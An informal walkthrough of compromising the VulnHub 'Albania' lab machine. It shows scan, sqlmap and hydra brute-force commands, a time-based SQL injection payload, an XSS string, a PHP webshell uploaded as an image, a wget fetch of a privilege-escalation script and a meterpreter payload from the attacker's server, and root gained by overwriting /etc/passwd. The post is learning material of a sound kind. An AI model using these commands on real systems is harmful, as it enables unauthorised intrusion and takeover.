Please pardon the informality in this post 😛
First did an nmap scan on all ports.
Had 22 and 8008 open.
Browsed to 8008 and had a meme on the front page.
Ran Nikto and found interesting robots.txt
Started plugging and chugging until this one gave
Navigated to vulnbank/
At this point it’s been 5 minutes and I’ve made a lot of progress.
I threw a single quote into the username field and got a sql error back so I ran sqlmap.
Sqlmap seemed to be able to inject into the username field, however, I wasn’t able to get any information out of it… I should probably get better at sql injection.
sqlmap –url http://192.168.1.235:8008/unisxcudkqjydw/vulnbank/client/login.php –data=’username=admin’
Next I tried a hydra brute force with the username admin and using the rock you password list.
hydra 192.168.1.235 http-form-post “/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid” -l admin -P rockyou.txt -t 32 -w 30 -o hydra_output.txt -s 8008
After struggling with both these tools for a while I decided to run dirb and found two directories. One contained to images. One being this meme.
The other directory found was a /upload/ which yields a white screen… Which I have no idea what to do with…
At this point I’m kinda stuck. Not knowing what to do, I went back to sqlmap. It had a generated payload that started with (username=1’ — ) I plugged that in an didn’t get an error… So I started throwing random stuff.
Got stuck and looked at a walkthrough right here. This was the syntax I needed. Which I didn’t even know.
username=1′ RLIKE SLEEP(5) –
I see the upload function and immediately think webshell
Plugged <script>Alert(1)</script> and got xxs in the problem field. Tried uploading my php webshell but only image files are allowed. Uploaded the webshell as an image and now I’m going to try to rename it.
Just a heads up. No way to remove the xxs. So now it’s really annoying.
Changed the extension to .jpg and navigated to it. And it still executed… Not exactly sure why.
I looked around, no easy cronjobs or noticeable files. So I decide to see if there are any hardcoded passwords in the website that we were trying to get sql injection in.
Sure enough, we found some database passwords
$db_host = “127.0.0.1”;
$db_name = “bank_database”;
$db_user = “root”;
$db_password = “NuCiGoGo321”;
I try to start using mysql but I can’t because my shell isn’t good enough
So I had to pass them over the cmd line with this command
mysql -u root -p -e ‘Show Tables’ bank_database
mysql -u root -p -e ‘Select * From klienti’ bank_database
Got this back
ID emer mbiemer bilanci username password
1 Charles D. Hobson 25000 hobson Charles123
\n Fischer 120000 jeff jeff321
Tried the jeff user but it doesn’t look like he has anything that Charles didn’t.
Kinda got stuck again. Thought I could do something after finding those creds but couldn’t find anything. So I started trying to find was to priv escalate. First things first is check /etc/passwd.
This looks like the user I probably need to get to.
Decided to transfer a unix privesc-check script using apache and wget.
However, it needed strings to run so no luck there. No idea how a linux system doesn’t have strings…
Anyway! I ran this one liner to find writeable files.
find / -perm -0002 -type f -print -xdev 2>/dev/null
The two files in temp were my uploaded privesc check script.
And turns out I can write to /etc/passwd. However, I’m not sure this is a lead but it’s worth looking into.
However, since my shell is so bad, I can’t edit it with nano or vi. So I gotta figure out how to upgrade it.
Finally figured out how to generate a msfpayload.
Uploaded it to the target using my apache server and then got a meterpreter session.
Here you can see all my failed payload generations!
So now I needed to add a password to /etc/passwd/ so I can su. After trying a bunch of things I couldn’t get it so I looked at the Walkthrough by G0blin – https://g0blin.co.uk/albania-vulnhub-writeup/.
openssl passwd -1 -salt salt letmein
I couldn’t seem to use any text editor so I created the file on my desktop, uploaded it. And then
Cat passwd > /etc/passwd
Now I have root.